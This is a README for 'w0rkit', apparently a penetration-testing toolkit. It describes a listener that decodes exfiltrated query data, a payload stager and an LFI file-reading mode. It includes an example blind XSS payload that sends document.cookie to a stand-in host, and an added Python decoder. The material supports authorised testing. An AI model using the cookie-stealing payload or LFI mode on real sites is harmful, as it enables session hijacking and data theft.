jarviscodes/w0rkit
w0rkit

A small toolkit containing response handling and parsing solutions that come in handy during PT/BH.

Disclaimer: Pls no evil :(

Installation

  1. git clone ...; cd w0rkit

  2. poetry install

  3. poetry shell

Done :-)

Refactoring Branch

Since most of this tool is being scripted together on the fly, we have a branch dedicated to refactoring. The main branch should contain a working version, but usage, code and some minor features might differ in the unstable refactoring branch.

Usage

A new way of running the tool is introduced in order to make it more extensible. LFI mode is currently under very active development (unstable, don't expect it to work for your purpose). The web mode is stable and can be used as demonstrated below.

The new modes are web and lfi; web contains the old stager and the response receiver/decoder.

Web

Currently supports two modes: simple and b64d.

Simple

Just logs request source, headers and parameters. GET only.

w0rkit web simple -l [listen_address] -p [listen_port]

So with -l 127.0.0.1 and -p 80:

$ curl "http://localhost/?query1=foo&query2=bar&something=somethingelse"
OK

Result: [screenshot in the original README]

b64d

Fetches a magic_param from the GET query parameters, base64-decodes it and removes the URL encoding.

w0rkit web b64d -l [listen_address] -p [listen_port] -m [magic_param]

-m is optional and defaults to ?q=.

So with -l 127.0.0.1, -p 80 and -m decodeme:

$ curl "http://localhost/?decodeme=JTNDaHRtbCUzRSUwQSUzQ2hlYWQlM0UlMEElM0N0aXRsZSUzRU9oJTIwd293JTJDJTIwc28lMjByZWFkYWJsZSUzQy90aXRsZSUzRSUwQSUzQy9oZWFkJTNFJTBBJTNDYm9keSUzRSUwQSUzQy9ib2R5JTNFJTBBJTNDL2h0bWwlM0U%3D%3D"
OK

Result: [screenshot in the original README]
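The decoding step b64d performs, written out as an added example that is not part of w0rkit, in Python since that is the project's language. It takes the query value as a web framework hands it over after one round of URL decoding; README_SAMPLE_URL is the curl request above, the function names are mine, and the block also handles two edge cases the description does not mention: the %uXXXX sequences JavaScript's escape() emits and a '+' in the base64 that arrives as a space when the sender omits encodeURIComponent().

```python
import base64
import binascii
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# The curl request from the README above; the value reaches the app as "...M0U==".
README_SAMPLE_URL = (
    "http://localhost/?decodeme=JTNDaHRtbCUzRSUwQSUzQ2hlYWQlM0UlMEElM0N0aXRsZSUzRU9o"
    "JTIwd293JTJDJTIwc28lMjByZWFkYWJsZSUzQy90aXRsZSUzRSUwQSUzQy9oZWFkJTNFJTBBJTNDYm9k"
    "eSUzRSUwQSUzQy9ib2R5JTNFJTBBJTNDL2h0bWwlM0U%3D%3D"
)

# JavaScript's escape() writes code points above U+00FF as %uXXXX, which
# urllib.parse.unquote leaves untouched; decode those first.
_JS_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def unescape_js(text: str) -> str:
    """Undo JavaScript escape(): %uXXXX first, then the ordinary %XX sequences."""
    text = _JS_UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def b64d_decode(value: str) -> str:
    """Reverse btoa(escape(x)) for a query value already URL-decoded once by the
    HTTP layer: base64-decode, then strip the URL encoding (the b64d step)."""
    # A raw '+' in btoa() output becomes a space at the HTTP layer when the
    # sender forgets encodeURIComponent(); put it back before decoding.
    value = value.replace(" ", "+")
    # Padding is often stripped or doubled (the README sample ends in "=="); renormalise.
    stripped = value.rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except binascii.Error:
        raw = base64.urlsafe_b64decode(padded)  # tolerate the URL-safe alphabet
    return unescape_js(raw.decode("utf-8", errors="replace"))


def decode_request(url: str, magic_param: str = "q") -> Optional[str]:
    """Pull the magic parameter out of a request URL and decode it (-m defaults to q)."""
    values = parse_qs(urlsplit(url).query).get(magic_param)
    return b64d_decode(values[0]) if values else None


if __name__ == "__main__":
    print(decode_request(README_SAMPLE_URL, magic_param="decodeme"))
```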

Stager

All web apps also have a stager route. Since the first merge of the refactoring branch (v0.0.2), the stager directory is configurable with -r. By default it will try to load from /tmp/stager, which defaults to C:\tmp\stager on Windows. The stager can be used in a lot of different attacks. This is a safer replacement-to-be for always running python3 -m http.server :-)

An example (hardcoded) blind XSS/CSRF attack is currently included in the stager.

Note: the screenshots might differ from the current options; use --help to see what is available.

The example payload looks like this:

// This is just an example payload that you could serve

async function runPayload() {
    // Sends document.cookie to the listener as the b64d-encoded q parameter
    await fetch(`http://back-to-our-host.local/?q=${btoa(escape(document.cookie))}`)
}

runPayload()

So by visiting http://localhost/stager/example.html while running in b64d mode with -s (--stager) enabled:

Result: [screenshot in the original README]

LFI

Interrogate

Interactive LFI interrogation mode. Facilitates requesting and decoding files after a successful exploitation has been found.

w0rkit lfi interrogate -i "http://vulnerable.target/index.php?filepath=" --filter-mode spf

Useful for

  • Serving anything, like RFI or DTD payloads (and exfiltrating easily with b64d in OOB situations)
  • XSS pivoting
  • Interactive LFI (Soon™ WIP!)

Happy Hunting!
